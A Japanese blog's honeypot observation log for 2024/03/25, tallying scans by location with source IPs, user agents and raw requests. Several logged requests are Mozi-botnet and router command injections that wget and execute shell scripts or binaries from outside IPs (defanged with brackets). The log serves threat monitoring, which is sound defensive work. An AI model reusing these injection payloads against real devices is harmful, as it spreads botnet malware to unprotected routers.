コンニチハレバレトシタアオゾラ

つれづれなるままに、日暮らし、ぶろぐにむかひて、心にうつりゆくよしなしごとを、そこはかとなく書きつくれば、

2024/03/25 ハニーポット(仮) 観測記録

ハニーポット(仮) 観測記録 2024/03/25分です。

特徴
共通

zgrabによるスキャン行為
/.envへのスキャン行為

Location:JP

NetGear製品の脆弱性を狙うアクセス
aiohttpによるスキャン行為
curlによるスキャン行為
.jsへのスキャン行為
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget http://192.168.1.1:8088/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws
Location:US

D-link製品の脆弱性を狙うアクセス
Spring Cloud Gateway脆弱性(CVE-2022-22947)を狙うアクセス
TP-Link製品の脆弱性を狙うアクセス
CensysInspectによるスキャン行為
/.gitへのスキャン行為

を確認しました。

Location:UK

D-link製品の脆弱性を狙うアクセス
Spring Cloud Gateway脆弱性(CVE-2022-22947)を狙うアクセス
CensysInspectによるスキャン行為
curlによるスキャン行為
.jsへのスキャン行為

を確認しました。

Location:SG

D-link製品の脆弱性を狙うアクセス
Spring Cloud Gateway脆弱性(CVE-2022-22947)を狙うアクセス
CensysInspectによるスキャン行為
curlによるスキャン行為
.jsへのスキャン行為

を確認しました。

アクセス数推移

JP:総アクセス数:65 (前日比:2)
US:総アクセス数:83 (前日比:17)
UK:総アクセス数:82 (前日比:0)
SG:総アクセス数:76 (前日比:-93)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数 送信元IPアドレス
1 45.56.108.128 United States
1 45.83.31.99 Netherlands
1 45.83.66.210 Germany
1 45.95.168.191 Croatia
13 64.225.24.59 United States
1 75.119.150.78 Germany
2 80.82.78.39 United Kingdom
1 91.92.245.67 Bulgaria
2 91.92.251.178 Bulgaria
1 107.170.231.45 United States
1 115.63.206.213 China
4 135.125.217.54 France
11 135.125.246.189 France
1 146.190.50.175 United States
2 154.38.162.0 United States
4 164.52.0.94 China
1 172.104.11.34 United States
1 172.105.128.12 United States
2 172.208.71.248 France
1 178.72.81.145 Russia
7 185.254.196.173 Ukraine
1 188.166.172.8 United States
1 192.241.207.46 United States
2 205.210.31.133 United States
2 205.210.31.226 United States

UserAgent一覧

件数 UserAgent
18 -
1 Hello, world
1 Microsoft+BITS/7.8
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
8 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0
26 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 zgrab/0.x
2 Mozilla/5.0
1 Python/3.7 aiohttp/3.7.4.post0
1 curl/8.1.2

リクエスト内容一覧

件数 Method Request Protocol
1 MGLNDD_18.179.20.5_80\n
1 \x16\x03\x01\x01\xfa\x01
2 \x16\x03\x01\x02
11 \x16\x03\x01
1 CONNECT api[.]ipify[.]org:443 HTTP/1.1
28 GET /.env HTTP/1.1
1 GET /1.php HTTP/1.1
1 GET /SMS_DP_SMSPKG$/Datalib HTTP/1.0
1 GET /bundle.js HTTP/1.1
4 GET /favicon.ico HTTP/1.1
1 GET /files/ HTTP/1.1
1 GET /form.html HTTP/1.1
1 GET /geoip/ HTTP/1.1
1 GET /ghauri HTTP/1.1
1 GET /info.php HTTP/1.1
1 GET /manager/text/list HTTP/1.1
1 GET /password.php HTTP/1.1
2 GET /sendgrid/.env HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//115[.]63[.]206[.]213:49218/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws HTTP/1.1
1 GET /systembc/password.php HTTP/1.1
1 GET /systembc/password.php HTTP/1.0
1 GET /upl.php HTTP/1.1
Location:US

送信元IPアドレス一覧

件数 送信元IPアドレス
1 8.137.106.178 Singapore
20 18.170.222.70 United States
1 35.203.210.241 United States
2 45.33.80.243 United States
3 45.79.181.251 United States
1 45.227.254.8 Belize
2 54.36.115.221 France
2 54.37.79.75 France
1 64.62.197.158 United States
1 65.49.1.97 United States
1 65.49.1.101 United States
1 65.49.1.102 United States
2 78.153.140.177 Russia
3 80.94.92.60 Romania
2 83.97.73.245 Germany
4 87.121.69.52 Bulgaria
1 104.131.144.35 United States
1 104.236.128.22 United States
1 106.75.133.175 China
1 106.75.165.113 China
1 106.75.173.108 China
1 106.75.173.226 China
1 129.227.241.151 Singapore
1 139.59.101.104 Singapore
2 143.198.214.253 United States
1 146.190.106.242 United States
2 157.230.37.129 United States
2 162.142.125.221 United States
2 164.90.174.244 United States
1 164.92.70.180 United States
2 167.71.201.139 United States
1 170.64.175.90 United States
1 172.104.11.34 United States
1 172.104.11.51 United States
1 176.124.220.52 Russia
2 183.136.225.9 China
2 185.122.204.179 Russia
1 185.170.144.3 Estonia
1 185.223.152.205 Spain
1 185.223.152.216 Spain
2 198.235.24.130 United States
2 198.235.24.222 United States
1 209.97.185.130 United States

UserAgent一覧

件数 UserAgent
9 'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https[:]//www[.]nokia[.]com/networks/ip-networks/deepfield/genome/)'
38 -
1 Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com
9 Go-http-client/1.1
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.4 Safari/605.1.15
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Safari/605.1.15
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Safari/605.1.15
3 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
2 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE
9 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)
1 Mozilla/5.0 zgrab/0.x
5 Mozilla/5.0

リクエスト内容一覧

件数 Method Request Protocol
1 MGLNDD_34.68.118.83_80\n
4 \x03
1 \x16\x03\x01\x01H\x01
2 \x16\x03\x01\x01\b\x01
3 \x16\x03\x01\x01\x07\x01
1 \x16\x03\x01\x01\xfb\x01
23 \x16\x03\x01
1 ``
4 CONNECT google[.]com:443 HTTP/1.1
1 GET /+CSCOE+/logon.html HTTP/1.1
1 GET /.DS_Store HTTP/1.1
6 GET /.env HTTP/1.1
3 GET /.git/config HTTP/1.1
2 GET /.vscode/sftp.json HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /actuator/gateway/routes HTTP/1.1
1 GET /admin/index.html HTTP/1.1
4 GET /cdn-cgi/trace HTTP/1.1
1 GET /cgi-bin/login.cgi HTTP/1.1
2 GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F94[.]156[.]8[.]244%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1
1 GET /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=wget+http[:]//94[.]156[.]8[.]244/wtf.sh;+/bin/sh+wtf[.]sh`` HTTP/1.1
1 GET /client/get_targets HTTP/1.1
1 GET /doc/index.html HTTP/1.1
4 GET /favicon.ico HTTP/1.1
1 GET /geoserver/web/ HTTP/1.1
2 GET /hello HTTP/1.1
1 GET /index.html HTTP/1.1
1 GET /login.jsp HTTP/1.1
1 GET /logon.htm HTTP/1.1
1 GET /manage/account/login HTTP/1.1
1 GET /manager/text/list HTTP/1.1
1 GET /robots.txt HTTP/1.1
1 GET /sendgrid/.env HTTP/1.1
1 GET /webui/ HTTP/1.1
1 HEAD /.env HTTP/1.1
1 PRI * HTTP/2.0
Location:UK

送信元IPアドレス一覧

件数 送信元IPアドレス
1 5.8.11.202 Russia
1 5.188.206.213 Russia
1 45.79.128.205 United States
1 45.79.181.251 United States
2 51.81.216.81 United States
8 54.36.115.221 France
2 54.37.79.75 France
6 57.129.23.166 France
1 62.102.148.164 Sweden
5 62.210.90.217 France
2 71.6.134.234 United States
1 74.82.47.2 United States
2 78.153.140.177 Russia
2 80.82.78.39 United Kingdom
1 80.94.92.60 Romania
2 83.97.73.245 Germany
4 87.121.69.52 Bulgaria
1 107.170.245.8 United States
1 139.59.101.104 Singapore
2 143.198.204.194 United States
2 162.142.125.10 United States
2 165.22.54.194 United States
2 165.154.225.168 Singapore
1 167.99.93.200 United States
13 170.64.218.26 United States
1 172.104.11.4 United States
1 172.104.11.34 United States
1 172.104.11.46 United States
1 172.105.128.11 United States
1 172.105.128.12 United States
2 183.136.225.32 China
3 184.105.139.67 United States
1 192.99.7.195 Canada
1 192.241.219.44 United States
2 198.235.24.155 United States
2 205.210.31.166 United States

UserAgent一覧

件数 UserAgent
25 -
5 Go-http-client/1.1
2 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36
8 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
4 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.3
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/109.0
1 Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
2 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE
1 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
17 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/110.0
1 Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)
1 Mozilla/5.0 zgrab/0.x
6 Mozilla/5.0
1 curl/7.81.0
1 curl/8.1.2

リクエスト内容一覧

件数 Method Request Protocol
1 MGLNDD_132.145.66.34_80\n
1 SSH-2.0-libssh2_1.10.0
1 \x16\x03\x01\x01H\x01
2 \x16\x03\x01\x01\x07\x01
1 \x16\x03\x01\x01\xfc\x01
18 \x16\x03\x01
4 CONNECT google[.]com:443 HTTP/1.1
19 GET /.env HTTP/1.1
1 GET /1.php HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /HNAP1/ HTTP/1.1
1 GET /actuator/gateway/routes HTTP/1.1
1 GET /ads.txt HTTP/1.1
1 GET /app-ads.txt HTTP/1.1
1 GET /bundle.js HTTP/1.1
4 GET /cdn-cgi/trace HTTP/1.1
1 GET /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=wget+http[:]//94[.]156[.]8[.]244/wtf.sh;+/bin/sh+wtf[.]sh`` HTTP/1.1
7 GET /favicon.ico HTTP/1.1
1 GET /files/ HTTP/1.1
1 GET /form.html HTTP/1.1
1 GET /geoip/ HTTP/1.1
1 GET /geoserver/web/ HTTP/1.1
1 GET /ghauri HTTP/1.1
1 GET /info.php HTTP/1.1
1 GET /manager/text/list HTTP/1.1
1 GET /password.php HTTP/1.1
1 GET /robots.txt HTTP/1.1
1 GET /sellers.json HTTP/1.1
1 GET /server-status HTTP/1.1
1 GET /systembc/password.php HTTP/1.1
1 GET /upl.php HTTP/1.1
1 GET /webui/ HTTP/1.1
1 HEAD / HTTP/1.1
1 PRI * HTTP/2.0
Location:SG

送信元IPアドレス一覧

件数 送信元IPアドレス
1 23.26.76.165 United States
1 35.203.211.197 United States
1 36.99.136.128 China
1 45.33.80.243 United States
1 45.56.108.128 United States
1 45.79.181.94 United States
1 45.79.181.104 United States
1 45.79.181.251 United States
5 51.159.214.49 France
3 54.36.115.221 France
8 54.37.79.75 France
1 64.62.197.224 United States
2 64.62.197.226 United States
2 78.153.140.177 Russia
2 78.153.140.179 Russia
2 80.82.78.39 United Kingdom
1 80.94.92.60 Romania
2 83.97.73.245 Germany
4 87.121.69.52 Bulgaria
1 146.190.50.175 United States
6 148.153.45.234 United States
2 157.230.45.135 United States
2 162.142.125.226 United States
13 170.64.218.26 United States
1 172.104.11.46 United States
1 172.104.11.51 United States
2 172.105.128.13 United States
1 192.241.223.60 United States
2 198.235.24.11 United States
2 198.235.24.199 United States
2 205.234.144.252 United States
1 216.218.206.68 United States

UserAgent一覧

件数 UserAgent
21 -
1 Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com
4 Go-http-client/1.1
1 Microsoft+BITS/7.8
3 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
6 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0
2 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Safari/605.1.15
8 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
4 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.3
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
13 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0
1 Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)
1 Mozilla/5.0 zgrab/0.x
3 Mozilla/5.0
1 curl/7.81.0
1 curl/8.1.2

リクエスト内容一覧

件数 Method Request Protocol
1 \x16\x03\x01\x01H\x01
1 \x16\x03\x01\x01\x07\x01
18 \x16\x03\x01
4 CONNECT google[.]com:443 HTTP/1.1
16 GET /.env HTTP/1.1
1 GET /1.php HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /OcaJ HTTP/1.1
1 GET /SMS_DP_SMSPKG$/Datalib HTTP/1.0
1 GET /aab8 HTTP/1.1
1 GET /aab9 HTTP/1.1
1 GET /actuator/gateway/routes HTTP/1.1
1 GET /ads.txt HTTP/1.1
1 GET /app-ads.txt HTTP/1.1
1 GET /bundle.js HTTP/1.1
1 GET /cdn-cgi/trace HTTP/1.1
1 GET /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=wget+http[:]//94[.]156[.]8[.]244/wtf.sh;+/bin/sh+wtf[.]sh`` HTTP/1.1
1 GET /client/get_targets HTTP/1.1
5 GET /favicon.ico HTTP/1.1
1 GET /files/ HTTP/1.1
1 GET /form.html HTTP/1.1
1 GET /geoip/ HTTP/1.1
1 GET /geoserver/web/ HTTP/1.1
1 GET /ghauri HTTP/1.1
1 GET /info.php HTTP/1.1
1 GET /jquery-3.3.1.slim.min.js HTTP/1.1
1 GET /jquery-3.3.2.slim.min.js HTTP/1.1
1 GET /manager/text/list HTTP/1.1
1 GET /password.php HTTP/1.1
1 GET /sellers.json HTTP/1.1
1 GET /systembc/password.php HTTP/1.1
1 GET /systembc/password.php HTTP/1.0
1 GET /upl.php HTTP/1.1
1 GET /vADa HTTP/1.1
1 GET /webui/ HTTP/1.1
1 HEAD / HTTP/1.1
1 PRI * HTTP/2.0